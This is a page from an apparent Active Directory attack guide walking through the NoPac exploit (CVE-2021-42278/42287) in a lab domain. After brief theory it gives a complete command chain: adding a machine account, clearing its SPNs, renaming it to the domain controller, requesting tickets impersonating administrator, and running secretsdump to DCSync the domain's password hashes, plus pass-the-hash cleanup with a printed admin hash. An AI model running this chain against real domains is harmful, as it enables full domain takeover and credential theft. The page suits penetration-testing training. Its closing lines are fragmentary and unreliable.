Attacking Active Directory
  • Reconnaissance
    • Enumerate Network
    • Enumerating Users With CME - Anonymously
    • Enumerate Users Anonymously - RPC
    • Enumerating User with Ldapsearch and enum4linux - Anonymously
    • Enumerate Guest Access on Shares - CME
  • Exploiting With Poison and Relay
    • Responder
    • NTLM relay
    • Secretsdump
    • Lsassy
    • DonPapi
    • Pass The Hash with Winpexec.py
    • Pass The Hash with Evil-Winrm
    • Pass the Hash with CrackMapExec
    • Coerced auth smb + ntlmrelayx to ldaps with drop the mic
  • User Enumeration Exploit
    • setup /etc/hosts and kerberos
    • Exploiting Username - ASREPRoast
    • Password Spraying
    • User listing with GetADUsers and ldapsearch
    • Kerberoasting
    • Powerview
      • Setting Up PowerView
      • Get-NetUser
      • Get-NetGroup
      • Get-NetComputer
      • Get-NetFileServer
      • Get-NetGPO
      • Get-ObjectAcl
      • Get-NetDomainTrust
      • Invoke-Portscan
    • Enumerate Shares with User Account
  • Exploiting with Users
    • SamAccountName (NoPac)
      • Semi Manual Exploit
      • From Linux With NoPAC.py
      • From Windows With noPAC.exe
    • PrintNightmare - Bronx
      • Check and Prepare
      • windows and linux
    • PrintNightmare - Baltimore
      • Exploit
  • WSUS Exploit
  • Active Directory Certificate Services (ADCS)
    • Bloodhound
      • Bloodhound - Install Neo4j
      • Run BloodHound
      • ADCS reconnaissance and enumeration (with certipy and bloodhound)
    • ESC8 - coerce to domain admin
    • ESC8 - with certipy
    • ADCS - ESC1
    • ADCS - ESC2 & ESC3
    • ADCS - ESC4
    • ADCS - ESC6
    • Certifried - CVE-2022–26923
    • Shadow Credentials
  • Metasploit
    • Initial Shell Shell Shell
    • Enumeration 1 - Users, Groups, Computers
    • Enumeration 2 - Arp, Tokens, Patches
    • Enumeration 3 - Shares, SMB, and More
    • Back Door Add User
    • Metasploit Exploit Suggester
    • HashDump With Metasploit
    • Lateral Movement With Metasploit
    • DsSync With Metasploit from NT Autority/System to Administrator
    • Golden Ticket with Metasploit
    • Using a Keylogger with Metasploit
    • BackDoor Meterpreter Service
  • Privilege Escalation
  • User ACL Exploits
    • Hunting with bloodhound
    • ACL With BloodHound
    • ForceChangePassword on User (Donald-> Hugo)
    • GenericWrite on User (Hugo -> Ramon)
    • WriteDacl on User (Ramon-> Nicolas)
    • Add self on Group (Nicolas-> RadioCity)
    • AddMember on Group (RadioCity -> EmpireState)
    • WriteOwner on Group (EmpireState -> CentralPark)
    • Generic all on user (CentralPark -> diego.Montenegro)
      • machine account to administrator shell
      • Silver ticket
    • GPO abuse
    • Read Laps password
  • MSSQL servers Exploitation
    • Enumerate the MSSQL servers
    • Enumerate MSSQL servers with GetUserSPNs & NMAP
    • Enumerate MSSQL servers with CrackMap & Impacket
    • impersonate - execute as login
    • MSSQL Coerce and relay
    • MSSQL trusted links
    • MSSQL Command execution to shell - Yonkers
    • MSSQL Command execution to shell - Salisbury
  • Delegations
    • Unconstrain
    • Constrain Delegation
      • With Protocol Transmition
      • Without protocol transition
    • Resource Based Constrained Delegation
    • Unconstrained delegation Enum
  • Trust
    • Enumerate Trust
    • Domain Trust - child/parent (north.newyork.local -> newyork.local)
      • RaiseMeUp - Escalate with impacket raiseChild
      • Golden ticket + ExtraSid
      • Trust ticket - forge inter-realm TGT
    • Forest Trust (newyork.local -> maryland.local)
      • Foreign group and users
      • Use unconstrained delegation
      • Mssql Trusted link
      • Golden ticket with external forest, sid history ftw ( Maryland-> NewYork)
      • Trust ticket with external forest ( maryland.local-> newyork.local)
      • Exploit acl with external trust golden ticket
  • Exploiting IIS & Privilege escalation
    • IIS - webshell
    • Privesc SeImpersonatePrivilege
    • winPeas without touching disk
    • SeImpersonatePrivilege to Authority\system
    • KrbRelay Up - Linux
    • KrbRelay Up - Windows - PowerPack
    • KrbRelay Up - Windows V2
  • Impacket
    • Install Impacket
    • Getting Initial Shell
Powered by GitBook
On this page
  • Theory
  • CVE-2021-42278 - Name impersonation
  • CVE-2021-42287 - KDC bamboozling
  • Machine Account
  • Get renameMachine.py and Addspn.py
  1. Exploiting with Users
  2. SamAccountName (NoPac)

Semi Manual Exploit

PreviousSamAccountName (NoPac)NextFrom Linux With NoPAC.py

Last updated 2 years ago

Theory

In November 2021, two vulnerabilities caught the attention of many security researchers as they could allow domain escalation from a standard user.

CVE-2021-42278 - Name impersonation

Computer accounts should have a trailing $ in their name (i.e. sAMAccountName attribute) but no validation process existed to make sure of it. Abused in combination with CVE-2021-42287, it allowed attackers to impersonate domain controller accounts.

CVE-2021-42287 - KDC bamboozling

When requesting a Service Ticket, presenting a TGT is required first. When the service ticket is asked for is not found by the KDC, the KDC automatically searches again with a trailing $. What happens is that if a TGT is obtained for bob, and the bob user gets removed, using that TGT to request a service ticket for another user to himself (S4U2self) will result in the KDC looking for bob$ in AD. If the domain controller account bob$ exists, then bob (the user) just obtained a service ticket for bob$ (the domain controller account) as any other user .

Machine Account

The ability to edit a machine account's sAMAccountName and servicePrincipalName attributes is a requirement to the attack chain. The easiest way this can be achieved is by creating a computer account (e.g. by leveraging the MachineAccountQuota domain-level attribute if it's greater than 0). The creator of the new machine account has enough privileges to edit its attributes. Alternatively, taking control over the owner/creator of a computer account should do the job.

The attack can then be conducted as follows.

  1. Clear the controlled machine account servicePrincipalName attribute of any value that points to its name (e.g. host/machine.domain.local, RestrictedKrbHost/machine.domain.local)

  2. Change the controlled machine account sAMAccountName to a Domain Controller's name without the trailing $ ->

  3. Request a TGT for the controlled machine account

  4. Reset the controlled machine account sAMAccountName to its old value (or anything else different than the Domain Controller's name without the trailing $)

  5. Request a service ticket with S4U2self by presenting the TGT obtained before ->

  6. Get access to the domain controller (i.e. DCSync)

CVE-2021-42287 is a privilege escalation vulnerability associated with the Kerberos Privilege Attribute Certificate (PAC) in Active Directory Domain Services (AD DS). CVE-2021-42278 is a Security Account Manager (SAM) spoofing security bypass vulnerability. Threat actors could leverage these flaws to escalate to domain administrator privileges from a standard user account.

Gaining domain administrator access

What we will do is add a computer, clear the SPN of that computer, rename computer with the same name as the DC, obtain a TGT for that computer, reset the computer name to his original name, obtain a service ticket with the TGT we get previously and finally dcsync.

Get renameMachine.py and Addspn.py

git clone https://github.com/dirkjanm/krbrelayx.git
wget https://raw.githubusercontent.com/rabakuku/AD-TOOLS/main/addspn.py
mv addspn.py krbrelayx/.
cd krbrelayx

  • Add a new computer

addcomputer.py -computer-name 'samaccountname$' -computer-pass 'ComputerPassword' -dc-host nyc.newyork.local -domain-netbios newyork 'newyork.local/Donald.Trump:MaKeam3ricaGr3at'
python3 addspn.py --clear -t 'samaccountname$' -u 'newyork.local\Donald.Trump' -p 'MaKeam3ricaGr3at' 'nyc.newyork.local'

  • Rename the computer (computer -> DC)

python3 renameMachine.py -current-name 'samaccountname$' -new-name 'nyc' -dc-ip 'nyc.newyork.local' newyork.local/Donald.Trump:MaKeam3ricaGr3at

  • Obtain a TGT

getTGT.py -dc-ip 'nyc.newyork.local' 'newyork.local'/'nyc':'ComputerPassword'

  • Reset the computer name back to the original name

python3 renameMachine.py -current-name 'nyc' -new-name 'samaccountname$' newyork.local/Donald.Trump:MaKeam3ricaGr3at

  • Obtain a service ticket with S4U2self by presenting the previous TGT

export KRB5CCNAME=/home/kali/krbrelayx/nyc.ccache
getST.py -impersonate 'administrator' -spn 'CIFS/nyc.newyork.local' -k -no-pass -dc-ip 'nyc.newyork.local' 'newyork.local'/'nyc'

  • DCSync by presenting the service ticket

export KRB5CCNAME=/home/kali/krbrelayx/administrator@CIFS_nyc.newyork.local@NEWYORK.LOCAL.ccache
secretsdump.py -k -no-pass -dc-ip 'nyc.newyork.local' @'nyc.newyork.local'

  • And voilà, we got all the north domain ntds.dit informations :)

  • Now clean up by deleting the computer we created with the administrator account hash we just get

addcomputer.py -computer-name 'samaccountname$' -delete -dc-host nyc.newyork.local -domain-netbios NEWYORK -hashes 'aad3b435b51404eeaad3b435b51404ee:c66d72021a2d4744409969a581a1705e' 'newyork.local/Administrator'
Impacket v0.10.1.dev1+20220708.213759.8b1a99f7 - Copyright 2022 SecureAuth Corporation
[*] Successfully deleted samaccountname$.

NoPac relies on changing the of a computer account to the name of a domain controller. By default, every authenticated user can add up to ten computers to the domain. The exploitation process includes the following steps:

Clear the SPNs of our new computer (with dirkjan tool addspn)

SamAccountName
krbrelayx
🤯
CVE-2021-42278
CVE-2021-42287